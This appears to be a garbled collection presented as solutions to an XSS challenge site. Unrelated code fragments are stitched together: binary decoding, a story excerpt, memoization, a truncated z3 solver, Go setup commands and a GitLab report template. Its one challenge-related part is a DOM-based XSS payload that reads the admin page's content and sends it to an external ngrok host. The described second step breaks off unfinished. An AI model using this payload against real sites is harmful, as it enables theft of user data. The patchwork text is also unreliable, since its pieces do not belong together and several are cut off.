Solutions of https://xss.pwnfunction.com/
Dom-Based XSS
```python
import binascii

# Decode space-separated 8-bit binary groups into ASCII text.
txt = [int(t, 2) for t in '01001000 01100001 01110000 01110000 01111001 00100000 01000010 01101001 01110010 01110100 01101000 01100100 01100001 01111001'.split()]
print(b''.join(binascii.unhexlify('%02x' % c) for c in txt).decode())
```
```python
import re
from base64 import b64decode
import pprint

story1 = '''
It's somewhat dark in here, but the walls (unbroken except for the door by
which I entered) encircle an area no more than eight feet in diameter.
It's horribly dank and dusty--no one can have been in here for years.
Is that an open envelope over there on the floor?
It seems there is a letter inside. Thank heavens it's in English.
```
```python
"""Look for builtins..."""

import types

def is_builtins(v):
    """Does v seem to be the builtins?"""
    if hasattr(v, "open") and hasattr(v, "__import__"):
        return True
    if isinstance(v, dict):
        return "open" in v and "__import__" in v
```
```python
class Memoization(object):
    def __init__(self, func):
        self.func = func
        self.data = {}  # cache of results, keyed by argument

    def __call__(self, n, **kwargs):
        if n in self.data:
            return self.data[n]
        self.data[n] = self.func(n)
        # Return the freshly computed value so the first call is not None.
        return self.data[n]
```
Dom-Based XSS
First - XSS on the User
<http://g<!s://q?<!-<[<script>top.admin.location='https://196cffb1.ngrok.io/?data='+JSON.stringify(top.admin.document.getElementsByClassName('is-4')[0].textContent.trim());/\*](http://g)->a><http://g<!s://g.c?<!-<[a\\*/</script>alert(13);/*](http://g)->a>
Second - Create a page with two iframes. With one, you stay with the admin logged in and with the other one:
```python
from z3 import Solver, Ints, Or, And, Not, sat

x, y, z = Ints('x y z')
s = Solver()
s.add(x >= 0, x <= 9)
s.add(y >= 0, y <= 9)
s.add(z >= 0, z <= 9)
```
```sh
# Installing Go environment on Mac + Visual Studio Code + Oh My Zsh
brew install go
# Quote the heredoc delimiter so the variables are written literally and
# expanded when .zshrc is sourced, not frozen at the time of writing.
cat <<'EOT' >> "$HOME/.zshrc"
export GOROOT="/usr/local/Cellar/go/1.14.4/libexec/"
export GOPATH="$HOME/workspace/go"
export PATH="${PATH}:${GOPATH}:${GOPATH}/bin"
EOT
source "$HOME/.zshrc"
```
```sh
# concatenate two images with different sizes
convert image1.jpeg image2.jpeg -gravity Center -resize 800x200 +append output.jpeg
```
```
{{- /* Template based on https://docs.gitlab.com/ee/user/application_security/container_scanning/#reports-json-format */ -}}
{
  "version": "11.0.0",
  "vulnerabilities": [
  {{- $t_first := true }}
  {{- range . }}
  {{- $target := .Target }}
    {{- range .Vulnerabilities -}}
    {{- if $t_first -}}
      {{- $t_first = false -}}
```